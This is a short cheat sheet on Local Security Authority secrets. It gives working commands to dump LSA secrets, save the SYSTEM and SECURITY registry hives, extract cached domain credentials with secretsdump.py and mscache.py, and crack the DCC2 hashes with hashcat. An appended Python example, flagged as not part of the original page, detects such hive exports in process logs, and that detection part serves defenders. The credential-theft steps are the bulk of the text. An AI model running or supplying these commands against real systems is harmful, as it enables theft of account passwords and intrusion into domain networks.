LSA
Local Security Authority

Decrypt LSA secrets on target:
PS > Invoke-SharpSecDump -C "-target=127.0.0.1"

Domain cached credentials are stored within LSA secrets in the HKLM:\SECURITY registry hive. Save the SYSTEM and SECURITY hives on the target:
Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hive

Export registry hives and extract cached creds locally with secretsdump.py:
$ secretsdump.py -system system.hive -security security.hive LOCAL

Export registry hives and extract cached creds locally with mscache.py:
$ python mscache.py --system system.hive --security security.hive

Crack the extracted MSCash2/MSCache2 (DCC2) hashes with hashcat (mode 2100):
$ hashcat -m 2100 -O -a 0 -w 4 --session=dcc2 -o dcc2.out dcc2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
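
Detection side of the hive export above, as an added example that is not part of the original page: it scans process-creation command lines for reg save/export of the HKLM\SYSTEM and HKLM\SECURITY roots and rates a host "high" when both were saved, since that pair is what the offline extraction needs. The event tuples, host names and severity labels are constructed for illustration.

```python
import re
from collections import defaultdict

# "reg save|export" aimed at the root of HKLM\SYSTEM or HKLM\SECURITY.
# The (?!\\) lookahead skips subkeys such as HKLM\SYSTEM\CurrentControlSet.
HIVE_DUMP = re.compile(
    r'\breg(?:\.exe)?"?\s+(?:save|export)\s+"?'
    r'(?:hklm|hkey_local_machine)\\(system|security)\b(?!\\)',
    re.IGNORECASE,
)

# Constructed sample events (host, command line); not taken from a real log.
SAMPLE_EVENTS = [
    ("WS01", r"reg save hklm\system system.hive"),
    ("WS01", r"reg save hklm\security security.hive"),
    ("WS02", r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SYSTEM C:\Temp\s.hiv'),
    ("WS02", r"reg save hklm\system\CurrentControlSet\Control ctl.hiv"),
    ("WS03", r"reg query HKLM\SECURITY\Policy"),
]


def hives_saved(events):
    """Map each host to the set of sensitive hive roots it wrote to disk."""
    seen = defaultdict(set)
    for host, cmdline in events:
        match = HIVE_DUMP.search(cmdline)
        if match:
            seen[host].add(match.group(1).upper())
    return dict(seen)


def triage(events):
    """Rate a host 'high' when both SYSTEM and SECURITY were saved, else 'medium'."""
    return {
        host: "high" if hives == {"SYSTEM", "SECURITY"} else "medium"
        for host, hives in hives_saved(events).items()
    }


if __name__ == "__main__":
    for host, severity in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host}: {severity}")
```

In practice the command lines would come from Security event 4688 or Sysmon event 1, and the per-host grouping should also be bounded by a time window.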